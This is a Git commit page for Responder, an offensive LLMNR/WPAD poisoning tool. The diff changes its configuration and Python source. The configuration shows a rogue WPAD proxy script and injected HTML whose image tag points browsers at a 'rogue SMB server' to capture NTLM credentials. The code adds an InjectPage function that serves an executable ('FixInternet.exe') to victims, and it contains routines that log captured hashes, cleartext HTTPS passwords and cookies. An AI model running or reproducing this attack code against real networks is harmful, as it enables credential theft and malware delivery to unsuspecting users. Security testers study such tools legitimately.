Fixed serve-always and serve-exe with the new WPAD server.

noobzero · Aug 26, 2014 · cf7b477 · cf7b477
1 parent f69e93c
commit cf7b477
Show file tree

Hide file tree

Showing 2 changed files with 26 additions and 10 deletions.
diff --git a/Responder.conf b/Responder.conf
@@ -45,10 +45,8 @@ ExecFilename = FixInternet.exe
 WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
 ;
 ;HTML answer to inject.
-;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.
-;Also, the HTML has to be in this format "<html> Payload goes here...</html>".
+;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.Also, the HTML has to be in this format "<html> Payload goes here...</html>".
 HTMLToServe = <html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='2'></body></html> 
-;
 [HTTPS Server]
 ;
 ;Change to use your certs

diff --git a/Responder.py b/Responder.py
@@ -79,6 +79,7 @@
 Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
 FILENAME = config.get('HTTP Server', 'Filename')
 WPAD_Script = config.get('HTTP Server', 'WPADScript')
+HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
 RespondTo = config.get('Responder Core', 'RespondTo').strip()
 RespondTo.split(",")
 RespondToName = config.get('Responder Core', 'RespondToName').strip()
@@ -96,6 +97,9 @@
 Force_WPAD_Auth = options.Force_WPAD_Auth
 AnalyzeMode = options.Analyse
 
+if HTMLToServe == None:
+    HTMLToServe = ''
+
 if INTERFACE != "Not set":
     BIND_TO_Interface = INTERFACE
 
@@ -1617,7 +1621,6 @@ def Basic_Ntlm(Basic):
 
 def ServeEXE(data,client, Filename):
     Message = "[+]Sent %s file sent to: %s."%(Filename,client)
-    print Message
     logging.warning(Message)
     with open (Filename, "rb") as bk:
         data = bk.read()
@@ -1704,7 +1707,7 @@ def PacketSequence(data,client):
                 buffer1 = WpadCustom(data,client)
                 return buffer1
             else:
-                buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
+                buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
                 buffer1.calculate()
                 return str(buffer1)
 
@@ -1724,7 +1727,7 @@ def PacketSequence(data,client):
             buffer1 = WpadCustom(data,client)
             return buffer1
         else:
-            buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
+            buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
             buffer1.calculate()
             return str(buffer1)
 
@@ -1778,8 +1781,21 @@ def HandleGzip(Headers, Content, Payload):
     else:
         return False
 
+def InjectPage(data, client):
+    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
+        if IsExecutable(FILENAME):
+            buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
+            buffer1.calculate()
+            return str(buffer1)
+        else:
+            buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
+            buffer1.calculate()
+            return str(buffer1)
+    else:
+        return False
+
 def InjectData(data):
-    Payload = config.get('HTTP Server','HTMLToServe')
+    Payload = HTMLToServe
     if len(data.split('\r\n\r\n'))>1:
         try:
             Headers, Content = data.split('\r\n\r\n')
@@ -1906,8 +1922,10 @@ def _read_write(self, soc, netloc='', max_idling=30):
                     if i is soc:
                         out = self.connection
                         try:
-                            if len(config.get('HTTP Server','HTMLToServe'))>5:
+                            if len(HTMLToServe)>5:
                                 data = InjectData(i.recv(8192))
+                            if InjectPage(i.recv(8192),self.client_address[0]):
+                                data = InjectPage(i.recv(8192),self.client_address[0])
                             else:
                                 data = i.recv(8192)
                         except:
@@ -2011,15 +2029,15 @@ def HTTPSPacketSequence(data,client):
         if packetNtlm == "\x03":
             NTLM_Auth= b64decode(''.join(a))
             ParseHTTPSHash(NTLM_Auth,client)
-            buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
+            buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
             return buffer1
     if b:
         GrabCookie(data,client)
         outfile = os.path.join(ResponderPATH,"HTTPS-Clear-Text-Password-"+client+".txt")
         WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
         print "[+]HTTPS-User & Password:", b64decode(''.join(b))
         logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
-        buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
+        buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
         return buffer1
 
     else: